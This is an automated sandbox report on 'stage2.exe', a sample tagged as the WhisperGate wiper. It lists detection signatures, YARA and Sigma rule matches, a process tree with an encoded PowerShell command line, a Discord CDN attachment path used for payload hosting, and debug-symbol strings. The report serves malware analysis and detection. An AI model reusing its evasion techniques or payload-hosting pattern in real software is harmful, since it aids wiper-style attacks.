Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report stage2.exe

Overview

General Information

Sample Name:stage2.exe
Analysis ID:553986
MD5:14c8482f302b5e81e3fa1b18a509289d
SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags:DEV-0586exeWhisperGate
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • stage2.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\stage2.exe" MD5: 14C8482F302B5E81E3FA1B18A509289D)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
stage2.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
stage2.exeAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3cc8:$s1: xownxloxadDxatxxax
  • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
  • 0x8194:$s4: fffxfff.fff
  • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
stage2.exeMAL_Unknown_Discord_Characteristics_Jan22_1Detects unknown malware with a few indicators also found in Wiper malwareFlorian Roth
  • 0x3cc8:$x1: xownxloxadDxatxxax
  • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
Process Memory Space: stage2.exe PID: 7084JoeSecurity_MSIL_Downloader_GenericYara detected MSIL_Downloader_GenericJoe Security
    Click to see the 2 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.stage2.exe.ea0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.2.stage2.exe.ea0000.0.unpackAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    1.2.stage2.exe.ea0000.0.unpackMAL_Unknown_Discord_Characteristics_Jan22_1Detects unknown malware with a few indicators also found in Wiper malwareFlorian Roth
    • 0x3cc8:$x1: xownxloxadDxatxxax
    • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpackAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    Click to see the 7 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Suspicious Execution of Powershell with Base64Show sources
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: T1086 PowerShell ExecutionShow sources
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132868886483971359.7160.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: stage2.exeVirustotal: Detection: 44%Perma Link
    Source: stage2.exeReversingLabs: Detection: 48%
    Machine Learning detection for sampleShow sources
    Source: stage2.exeJoe Sandbox ML: detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
    Source: stage2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: stage2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
